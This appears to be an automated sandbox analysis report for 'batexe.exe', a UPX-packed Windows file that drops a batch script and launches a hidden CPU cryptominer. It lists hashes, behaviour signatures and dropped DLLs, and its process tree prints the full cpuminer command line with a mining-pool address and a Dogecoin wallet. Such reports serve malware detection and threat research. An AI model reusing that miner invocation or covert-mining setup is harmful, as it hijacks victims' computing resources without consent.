73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
22/02/2024, 04:50

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3492	b2e.exe
3668	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3668	cpuminer-sse2.exe
3668	cpuminer-sse2.exe
3668	cpuminer-sse2.exe
3668	cpuminer-sse2.exe
3668	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/244-7-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 244 wrote to memory of 3492	244	batexe.exe	89
PID 244 wrote to memory of 3492	244	batexe.exe	89
PID 244 wrote to memory of 3492	244	batexe.exe	89
PID 3492 wrote to memory of 4892	3492	b2e.exe	90
PID 3492 wrote to memory of 4892	3492	b2e.exe	90
PID 3492 wrote to memory of 4892	3492	b2e.exe	90
PID 4892 wrote to memory of 3668	4892	cmd.exe	93
PID 4892 wrote to memory of 3668	4892	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:244
- C:\Users\Admin\AppData\Local\Temp\5498.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5498.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5498.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5719.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4892
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5498.tmp\b2e.exe

Filesize
715KB

MD5
6b554760b5613c0c84ac28c34296b36b

SHA1
3c4fb94022e103e959deaf3bf032d8cb0bdf6862

SHA256
5bd1e971255d5e7b12782af101c74e262d213b3560ffa90b4f2834600a8e0ca4

SHA512
c15bae6fb1e68504c9dc779f45ee47d286726ca6aaa26f0d20d644f8663e4a65ef65a6bf9fd8724692302443fb776f529f48f408bfcfcba8e67bbaeac6e62083

Download Submit
C:\Users\Admin\AppData\Local\Temp\5498.tmp\b2e.exe

Filesize
454KB

MD5
80b9b6ba9600586a47f14ada0358f722

SHA1
b56406ab23569f7233005b24c62e46ca82591e74

SHA256
99aa514f4a830404c779caad474cbdd57713ac9f4ccfa2927ed3ffa9ce0abccd

SHA512
60f2d3e568b2b0f742fc1eb67c8016eeb3e7634df124c650ed7647d17d2fc50adbdae7a727f2874e6ea66c2449174a1f2e2bf5a07dc70e7e6c23ce9a38dbfc1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5498.tmp\b2e.exe

Filesize
377KB

MD5
afa4a8853339d8d3aee70d7700adc730

SHA1
5972bf09a503cc049760c8a2d8b38d05b39fc6b8

SHA256
23e447b5b49fed2154d999685698b54064b8613c1d611be703809a70e1c20eca

SHA512
83dfdb7dd5aa0d5c0b456ae60793aaf7069778058e8e9b9ee8acab30ab08f28f50a90b525897536f0f1353b9bd5bfe2d8f06daca0bb269bb787b7ed3cc94d280

Download Submit
C:\Users\Admin\AppData\Local\Temp\5719.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
961KB

MD5
bc721dad7706b5c3abb28bad32739d97

SHA1
73decffd00e2cb932fac8f3af15bcdeb1e98757f

SHA256
a8e4c455b03276e6f5426c7f430e696b9cff562508d08cc2ec647e8644deef7e

SHA512
f484ed24407b1bbbb28ce03d42ccbee7d6de1cac65c304c0dcd4df103b7b14a69c760fb8d6a6655fee75df8c6862ef6c8371da3b04e3be74ac4cd235ea800904

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
994KB

MD5
4b19b5964ad9d1d4c887aa07f8194b7e

SHA1
f529ab4c32b5dfe2b74dbb1ef019996a0d669fa3

SHA256
af8b07ae343903f4b7e2578862a3efdac2b3c1922ad8fc71843145372817fdc4

SHA512
675dc9c95d63be1f75b29ae95f8236ad6b85876e8e71af7a2490139f47a11e478bc758fa7e93672e3e0545d0d5330be6cb3d969859187c99aa49752e06e5f4a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
746KB

MD5
de3e260eef8a7946c24f82ec3063a920

SHA1
a4a2a6a490667025831f8001767446338f9bc7b5

SHA256
9fe9d700cf0cd6e601debbeab8eb317a6364dc26fc4d549a436429bdda27cfc5

SHA512
e0002ae67f0bf09cb1cf6fa6da27630febab1b56661776f4a7b6bcb2cdf92b734bda538a9d2732beae757b84b8b318ccd16726010def2db7c4090bb74e3a5fa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
820KB

MD5
16b4a5f05e348fec1cf5fc74a7fb3fcb

SHA1
48374b03962e27b891bf722f55fbd1c28d375378

SHA256
2e29d657a81b7ed12f36bdae09028f99bd28f5bf4c783a493a38b266d792f0e5

SHA512
b7783935ede7c5f7297741fe95d04a8ce718a2887504f3a136b69a78730029069a32b8c3a4d1d74f9604bb3d031555d441bf740070ebafd9c6b9af0e7642f224

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
951KB

MD5
51234a43090eb117cfff16fd8be1eef9

SHA1
aea11539a5dcb65a00a9fc9ef3f52d3cf1b21567

SHA256
91f24842d8d1bdda6ccfd81e93dd0f135edcecf50565163227eb104aa0dab49d

SHA512
185003e39fb7105bf4faf7e254e00404e98e16fb9c89f83ca94de4222a5a596b73ae493ae3f5e2a86178d4f043284d815330afa720f996c81db0586a749703cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
941KB

MD5
5815babb165ff584691bef1493198dd4

SHA1
8cc6e0de94441d9add2d55484c34946da7693ec7

SHA256
e783ddbaefb0b841bb71bc2b3184fb5a6f80feab0956bb2c084ef144c4a8b3e7

SHA512
d53297a04f993cf9fe089b684bbdea4a9ce968860d019974975c8dcf1464d282e3658eb3fb458ff4e51fa0f6e7186177d5bf20a84195aa05eefec6da645165da

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
44f51ca358dd3f8b837a7e1e0c5aec1b

SHA1
6398c931539e175f2fe1fc458be7a6a14b67d9bf

SHA256
cd5d10377ef01dda3b827968cd5a94e5689b6cce711a5a8b9f3fab7bdb775b19

SHA512
77d020ac8e8ae5de0f1b4ca2fdf21f3a9ef026b0e68549fde1eac2527dbe43776a155ad42583b3efb17e99d9c3ff5b5d194fb3a5a17003f96d2d73e7837fdc96

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
542e5c91ec6dedebef5f21d771fac149

SHA1
1819b89c14f82d9d74059e278910b973c17cbb2b

SHA256
38fb9316a7c8e58626b7e6f7589cd5e3619e34b5c1eace62c1da77379d966a1d

SHA512
7a3a7b2c96bdf067a3ddee68623ec8216797e33043579f8737cfea777b6f42c74454f9538f9525bffbc600077e41d775033a60d919c1a6b1a63935360417948d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
735KB

MD5
d21f43c89b8ea0706e9db1921dfb2249

SHA1
081ab9a1cd27baa1e76f334f1e71f03675f314cf

SHA256
63f532522cb9cdc5bb3fe0416e39e10660df6ea783b63a844d90a1e01e4a5fbe

SHA512
9db46d26f961c51ed10c1aca73f96968614eb514d356e6de19f85a16108cb4ab3ead86e4fa59f37ce7f1e6bc4546c13b9af6261089dda1dce620505c51906117

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/244-7-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3492-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3492-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3668-46-0x000000006E470000-0x000000006E508000-memory.dmp

Filesize
608KB

Download
memory/3668-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3668-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-47-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/3668-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3668-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3668-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download